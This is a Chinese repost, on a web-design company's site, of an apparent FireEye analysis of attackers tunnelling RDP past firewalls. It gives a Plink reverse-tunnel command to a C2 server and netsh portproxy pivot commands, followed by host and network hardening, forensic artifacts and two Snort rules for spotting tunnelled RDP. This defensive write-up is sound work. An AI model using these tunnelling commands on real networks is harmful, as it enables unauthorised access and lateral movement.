這期內容當中小編將會給大家帶來有關怎么通過RDP隧道繞過網絡限制，文章內容豐富且以專業的角度為大家分析和敘述，閱讀完這篇文章希望大家可以有所收獲。

成都創新互聯專業為企業提供黎城網站建設、黎城做網站、黎城網站設計、黎城網站制作等企業網站建設、網頁設計與制作、黎城企業網站模板建站服務，10多年黎城做網站經驗，不只是建網站，更提供有價值的思路和整體網絡服務。

遠程桌面服務是Windows的一個組件，各種公司都使用它來為系統管理員，運維人員和遠程員工提供便利。另一方面，遠程桌面服務，特別是遠程桌面協議（RDP），也同樣為網絡攻擊者提供了便利。當善于滲透的攻擊者在目標網絡中建立了立足點并獲得充足的登錄憑據時，他們可能會從后門切換到直接使用RDP會話進行遠程訪問。當攻擊者通過合法流量進行遠程訪問時，入侵變得越來越難以檢測。

利用RDP突破網絡訪問規則

與非圖形后門相比，攻擊者更喜歡RDP的穩定性和功能性的優勢，因為后門程序可能會在系統上留下不必要的痕跡。因此，FireEye常常能捕獲到使用本機Windows RDP遠程桌面程序的攻擊者在受限環境中跨系統進行的橫向連接行為。傳統意義上，受防火墻和NAT規則保護的非暴露公司網絡通常被認為不容易受到入站RDP請求連接的影響。然而，攻擊者越來越多地開始使用網絡隧道和基于主機的端口轉發來破壞這些網絡訪問控制規則。

網絡隧道和端口轉發利用防火墻的“縫隙”（不受防火墻保護的端口，允許應用程序訪問受防火墻保護的網絡中的主機服務）與防火墻阻止的遠程服務器建立連接。一旦通過防火墻建立了與遠程服務器的連接，該連接就可以用作傳輸機制，通過防火墻發送接收數據或建立“隧道”，在本地偵聽服務（位于防火墻內），使遠程服務器可以訪問它們（位于防火墻外面），如圖1所示。

圖1：利用RDP和SSH隧道突破企業防火墻的實例

入站RDP隧道

通常，用于建立RDP會話隧道的實用程序是PuTTY Link，通常稱為Plink。Plink可用于使用任意源和目標端口與其他系統建立安全SSH網絡連接。由于許多網絡環境要么不嚴格執行協議檢查，要么不阻止從其網絡出站的SSH通信，使得攻擊者可以通過Plink創建加密隧道，允許受感染系統上的RDP端口與攻擊者C2服務器進行通信。

Plink的常用命令：

plink.exe <users>@<IP or domain> -pw <password> -P 22 -2 -4 -T -N -C -R 12345:127.0.0.1:3389

圖2 使用Plink成功創建RDP隧道

圖3 攻擊者利用受害者與C2服務器建立的隧道實現RDP會話

應該注意的是，對于能夠訪問目標網絡RDP端口的攻擊者，他們必須已能夠通過其他的方式訪問或進入目標網絡，以便上傳程序建立通信隧道。例如，攻擊者可以從網絡釣魚電子郵件開始，通過惡意程序在目標網絡中取得支點。在建立立足點后，逐步搜集相關憑據并提升權限。通過隧道建立RDP會話而進入受限網絡環境是攻擊者常用眾多訪問方法之一。

通過RDP跳板逐步滲透

RDP不僅是外部訪問目標網絡的完美工具，RDP會話還可以跨多個系統進行連接，以便在環境中橫向移動。 FireEye觀察到攻擊者曾使用本機Windows自帶的netsh網絡命令，創建RDP端口轉發，并以此作為訪問另外受限網段的跳板。

netsh端口轉發命令：

netsh interface portproxy add v4tov4 listenport=8001 listenaddress=<JUMP BOX IP> connectport=3389 connectaddress=<DESTINATION IP>netsh I p a v l=8001 listena=<JUMP BOX IP> connectp=3389 c=<DESTINATION IP>

例如，攻擊者可以配置跳板并在任意端口上偵聽從先前網絡發送的流量。然后，流量將通過跳板直接轉發到其它網絡上的任何系統，并使用指定端口，包括默認RDP端口TCP 3389。這種類型的RDP端口轉發為攻擊者提供了一種利用跳板而實現路由的方法。并且通過修改注冊表，可以實現在RDP會話期間，不打斷正在使用跳板的合法管理員。

圖4 通過跳板向其它網段進行橫向移動

RDP隧道的預防和檢測

如果啟用了RDP，攻擊者就可以通過隧道或端口轉發實現橫向移動并保持在目標網絡的存在。為了減緩攻擊行為和檢測這些類型的RDP攻擊，公司安全運維人員應該關注基于主機和基于網絡的防護和檢測機制。

基于主機的防護：

遠程桌面服務：在不需要遠程連接的情況下，在所有終端用戶工作站和系統上禁用遠程桌面服務。

基于主機的防火墻：啟用基于主機的防火墻規則，明確拒絕入站RDP連接。

本地帳戶：通過啟用“拒絕通過遠程桌面服務登錄”的安全設置，防止在工作站上使用本地帳戶遠程登錄。

基于主機的檢測：

注冊表項：

查看與Plink連接關聯的注冊表項，這些注冊表項可能存儲了用來識別特定的源和目的地址有關的信息。 默認情況下，PuTTY和Plink都會在Windows系統上的以下注冊表項中存儲會話信息和曾今連接過的ssh服務器：

HKEY_CURRENT_USER\Software\SimonTatham\PuTTYHKEY_CURRENT_USER\SoftWare\SimonTatham\PuTTY\SshHostKeys

同樣的，以下的Windows注冊表項存儲了使用netsh創建PortProxy配置：

HKEY_CURRENT_USER\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4

收集和查看這些注冊表項可以識別合法和異常的SSH隧道活動。可能還需要進一步審查表項以確認每項信息的具體用途。

事件日志：

查看完整的登錄事件的日志。常見的RDP登錄事件包含在Windows系統上的以下事件日志中：

%systemroot%\Windows\System32\winevt\Logs\Microsoft-TerminalServices-LocalSessionmanagerOperational.evtx%systemroot%\Windows\System32\winevt\Logs\Security.evtx

“TerminalServices-LocalSessionManager”日志包含有標識為EID 21的本地或遠程登錄成功事件，并且含有之前成功連接過的RDP會話，標識為EID 25表示合法用戶成功注銷。“安全”日志包含有成功類型為10 ，標識為EID 4624的遠程交互式登錄（RDP）事件。記錄為本地主機IP地址（127.0.0.1 - 127.255.255.255）的源IP地址意味著攻擊者可能使用端口轉發程序建立隧道并登錄3389端口

檢查` plink.exe` 程序的執行痕跡。請注意，攻擊者可以重命名程序名以避免檢測。相關痕跡包括但不限于：

Application Compatibility Cache/Shimcache 應用程序兼容性緩存

Amcache Amcache.hve記錄執應用程序的執行路徑、上次執行時間、以及SHA1值

Jump Lists Windows 7-10用來任務欄顯示經常使用或最近使用的項目

Prefetch 預讀取

Service Events 服務事件

CCM Recently Used Apps from the WMI repository WMI庫記錄的最近使用CCM的應用程序

Registry keys 注冊表

基于網絡的預防：

遠程連接：在需要RDP連接的情況下，強制從指定的主機或集中管理服務器啟動連接。

域帳戶：對特權帳戶（例如域管理員）和服務帳戶使用“拒絕通過遠程桌面服務登錄”的安全設置，因為這些類型的帳戶通常會被攻擊者用于橫向移動到網絡中的敏感區域。

基于網絡的檢測：

防火墻規則：查看現有防火墻規則以確定存在端口轉發漏洞的區域。除了預防使用端口轉發程序之外，還應對環境中工作站之間的內部通信進行監控。通常，工作站不需要直接相互通信，并且可以使用防火墻規則來阻止任何此類通信，除非需要才放行。

網絡流量：執行網絡流量的內容和協議檢查。并非所有給定端口上通信的流量都是正常的流量或者是協議相符的流量。例如，攻擊者可以使用TCP端口80或443與遠程服務器建立RDP隧道。深入檢查網絡流量可能會發現它實際上不是HTTP或HTTPS，而是完全不同的流量。因此，安全運維人員應密切監控其網絡流量。

Snort規則：當RDP通信連接的一方為特定的一些低端口時，有可能意味著有RDP隧道建立。下面提供了兩個示例Snort規則，可以幫助安全團隊來識別其網絡流量中的RDP隧道。

snortalert tcp any [21,22,23,25,53,80,443,8080] -> any !3389 (msg:"RDP - HANDSHAKE [Tunneled msts]"; dsize:<65; content:"|03 00 00|"; depth:3; content:"|e0|"; distance:2; within:1; content:"Cookie: mstshash="; distance:5; within:17; sid:1; rev:1;)alert tcp any [21,22,23,25,53,80,443,8080] -> any !3389 (msg:"RDP - HANDSHAKE [Tunneled]"; flow:established; content:"|c0 00|Duca"; depth:250; content:"rdpdr"; content:"cliprdr"; sid:2; rev:1;)

結論

RDP的出現為用戶提供了更大的自由和互操作性。但隨著越來越多的攻擊者使用RDP跨越有訪問限制的網絡并進行橫向移動，安全團隊正面臨著如何區分合法和惡意RDP流量的挑戰。因此，應采取適當的基于主機和網絡的預防和檢測方法來主動監控并能夠識別惡意RDP的使用情況。

上述就是小編為大家分享的怎么通過RDP隧道繞過網絡限制了，如果剛好有類似的疑惑，不妨參照上述分析進行理解。如果想知道更多相關知識，歡迎關注創新互聯行業資訊頻道。

名稱欄目：怎么通過RDP隧道繞過網絡限制
文章位置：http://vcdvsql.cn/article0/pegioo.html

成都網站建設公司_創新互聯，為您提供網站營銷、商城網站、自適應網站、ChatGPT、關鍵詞優化、移動網站建設

廣告

聲明：本網站發布的內容（圖片、視頻和文字）以用戶投稿、用戶轉載內容為主，如果涉及侵權請盡快告知，我們將會在第一時間刪除。文章觀點不代表本網站立場，如需處理請聯系客服。電話：028-86922220；郵箱：631063699@qq.com。內容未經允許不得轉載，或轉載時需注明來源： 創新互聯